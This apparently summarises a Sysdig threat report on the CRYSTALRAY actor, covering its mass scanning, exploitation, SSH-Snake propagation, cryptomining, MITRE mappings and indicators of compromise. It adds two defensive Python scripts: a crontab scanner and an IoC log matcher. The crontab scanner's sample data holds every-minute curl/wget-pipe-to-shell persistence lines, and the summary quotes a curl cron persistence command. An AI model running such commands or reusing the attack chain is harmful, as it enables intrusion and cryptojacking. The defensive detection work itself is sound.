CRYSTALRAY expanded from the SSH-Snake operation to conduct mass vulnerability scanning, exploitation, and backdoor deployment across 1,500+ victims, leveraging OSS tools from ProjectDiscovery. The group aims to steal credentials, deploy cryptominers, and maintain persistence, using tools like zmap, asn, httpx, nuclei, Platypus, and SSH-Snake. #CRYSTALRAY #SSH-Snake #Platypus #Sliver #Nuclei #Zmap #Httpx #Confluence #CVE-2022-44877
Keypoints
- CRYSTALRAY expanded its operations roughly 10x, targeting over 1,500 victims and more than 1,800 IPs.
- The actor relies on legitimate OSS tools from ProjectDiscovery (including pdtm, zmap, asn, httpx, nuclei, and Platypus) to automate discovery, scanning, and backdoor deployment.
- Reconnaissance uses country-specific IP ranges generated via ASN to focus scans, then zmap scans ports for vulnerable services, followed by httpx verification and nuclei CVE checks.
- Initial access often stems from modifying vulnerability PoCs (notably Confluence CVEs like CVE-2022-44877) to drop payloads and backdoors (Platypus/Sliver).
- Lateral movement hinges on SSH-Snake, which propagates using discovered SSH keys and credentials and exfiltrates data to its C2.
- Impact includes credential collection, cryptomining, and selling stolen credentials; dashboards (Platypus) track victims, with 100–400 per dashboard and broader scaling over time.
MITRE Techniques
- [T1595.001] Active Scanning – CRYSTALRAY creates a range of IPs for specific countries to launch scans with more precision than a botnet, but less precision than an APT or ransomware attack. “The United States and China combined for over 54% of the known targets.”
- [T1046] Network Service Discovery – zmap scans for vulnerable services across ports; “zmap is a single packet network scanner designed for internet-wide network surveys that is faster and has fewer false positives than nmap.”
- [T1595.001] Active Scanning – example commands to generate country CIDR blocks for scanning (Mexico example shown). “> asn -c .mx” and related pipelines.
- [T1021.004] SSH – Lateral Movement – SSH-Snake uses SSH keys and credentials it discovers to propagate to new systems. “SSH-SNAKE is a worm that uses ssh keys and credentials it discovers to propagate to new systems…”
- [T1555.003] Credentials in Environment Variables – Environment credential discovery and upload. “Environment Credentials… credentials in environment variables” and automated exfiltration of env data.
- [T1041] Exfiltration Over C2 Channel – C2 communication to exfiltrate results. “send the results from victims to their C2: … curl … to .”
- [T1053.005] Cron – Scheduled Task for cryptomining persistence – Linux cron-based persistence. “crontab -r (crontab -l 2>/dev/null; echo ‘* * * * * curl -v --user …’ … --background)”
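The cron entry quoted above (an every-minute schedule that fetches remote content with curl, embeds credentials via --user, and runs the result) is a pattern a defender can hunt for in crontab dumps. The following script is an added example, not code from the report or from Sysdig; the crontab lines it scans are constructed, and the scoring thresholds are heuristics chosen for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab lines (not taken from the report). The entries that
# fetch a URL and pipe it into a shell mirror the shape of the persistence
# command quoted under T1053.005; the others are benign noise.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
* * * * * curl -v --user user:pass http://203.0.113.10/x.sh | bash -s -- --background
* * * * * wget -q -O - http://198.51.100.7/run | sh
30 2 * * 0 curl -s https://example.com/health
"""

FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
INLINE_CREDS = re.compile(r"(--user|-u)\s+\S+:\S+")


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)


def parse_crontab(text):
    """Yield (raw_line, schedule, command) for each non-comment, non-empty entry."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)  # five schedule fields, then the command
        if len(parts) < 6:
            continue
        schedule, command = " ".join(parts[:5]), parts[5]
        yield line, schedule, command


def score_entry(schedule, command):
    """Return the list of suspicious signals observed in one crontab entry."""
    reasons = []
    if schedule == "* * * * *":
        reasons.append("runs every minute")
    if FETCH_TOOLS.search(command):
        reasons.append("fetches remote content")
    if PIPE_TO_SHELL.search(command):
        reasons.append("pipes download into a shell")
    if INLINE_CREDS.search(command):
        reasons.append("embeds credentials via --user")
    return reasons


def find_suspicious(text):
    """Flag entries that fetch remote content and show at least one more signal.

    The threshold is a heuristic: a lone scheduled curl to a health endpoint is
    common and benign, while fetch + every-minute + pipe-to-shell is the
    cryptominer persistence shape described in the report.
    """
    findings = []
    for line, schedule, command in parse_crontab(text):
        reasons = score_entry(schedule, command)
        if "fetches remote content" in reasons and len(reasons) >= 2:
            findings.append(Finding(line, reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_CRONTAB):
        print(f.line)
        for r in f.reasons:
            print("   -", r)
```

In practice you would feed it the output of `crontab -l` for every user plus the contents of /etc/cron.d; the regexes are deliberately narrow so that tuning them to your environment (for example adding `python -c` or `base64 -d` as execution sinks) is straightforward.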
Indicators of Compromise
- [Network] C2 IPs – 82.153.138.25, 157.245.193.241, 45.61.143.47
- [Domain] aextg.us.to, linux.kyun.li, ww-1.us.to (c2)
- [Binaries] CMiz – a22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e; HQdI – c98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f
- [Binaries] igx1 – da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9; pmqE – 06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9
- [Binaries] hostctld – 1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec; logrotate – b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605
- [Files] db.exe – f037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089; processlib2.so – 8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039
- [Files] processlib.so – 908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21; hostctld (duplicate hash shown above)
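The indicators above are most useful when checked automatically against DNS, connection and file-integrity telemetry. The script below is an added example, not part of the report: it loads the IPs, domains and SHA256 hashes listed in this section and matches them against a handful of constructed log lines, returning each hit with its kind and the label it carries in the IoC list.

```python
import re

# Indicators copied from the IoC list in this summary.
C2_IPS = {"82.153.138.25", "157.245.193.241", "45.61.143.47"}
C2_DOMAINS = {"aextg.us.to", "linux.kyun.li", "ww-1.us.to"}
SHA256_IOCS = {
    "a22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e": "CMiz",
    "c98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f": "HQdI",
    "da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9": "igx1",
    "06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9": "pmqE",
    "1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec": "hostctld",
    "b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605": "logrotate",
    "f037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089": "db.exe",
    "8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039": "processlib2.so",
    "908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21": "processlib.so",
}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")

# Constructed log lines (not real telemetry): one DNS hit, one connection hit,
# one file-integrity hit, and two benign lines that must not match.
SAMPLE_LOGS = [
    "2024-07-11T10:02:13Z dns query client=10.0.0.5 name=linux.kyun.li type=A",
    "2024-07-11T10:02:14Z conn src=10.0.0.5:51514 dst=45.61.143.47:443 proto=tcp",
    "2024-07-11T10:02:20Z fim path=/usr/bin/hostctld sha256=1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec",
    "2024-07-11T10:03:01Z conn src=10.0.0.5:51520 dst=93.184.216.34:443 proto=tcp",
    "2024-07-11T10:03:05Z dns query client=10.0.0.7 name=www.example.com type=A",
]


def match_line(line):
    """Return a list of (kind, value, label) for every indicator found in one line."""
    hits = []
    for m in IP_RE.finditer(line):
        if m.group(0) in C2_IPS:
            hits.append(("ip", m.group(0), "C2"))
    for m in HOST_RE.finditer(line):
        host = m.group(0).lower()
        if host in C2_DOMAINS:
            hits.append(("domain", host, "C2"))
    for m in SHA256_RE.finditer(line.lower()):
        label = SHA256_IOCS.get(m.group(0))
        if label:
            hits.append(("sha256", m.group(0), label))
    return hits


def scan_logs(lines):
    """Return (line_number, line, hits) for each line containing at least one indicator."""
    results = []
    for i, line in enumerate(lines):
        hits = match_line(line)
        if hits:
            results.append((i, line, hits))
    return results


if __name__ == "__main__":
    for i, line, hits in scan_logs(SAMPLE_LOGS):
        print(f"line {i}: {line}")
        for kind, value, label in hits:
            print(f"   {kind} {value} ({label})")
```

Matching on the raw indicator set is the baseline; a hit on one of the C2 addresses or on a hash such as the hostctld binary should be treated as an incident trigger, since the report ties them directly to the SSH-Snake and Platypus stages of the intrusion.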
Read more: https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/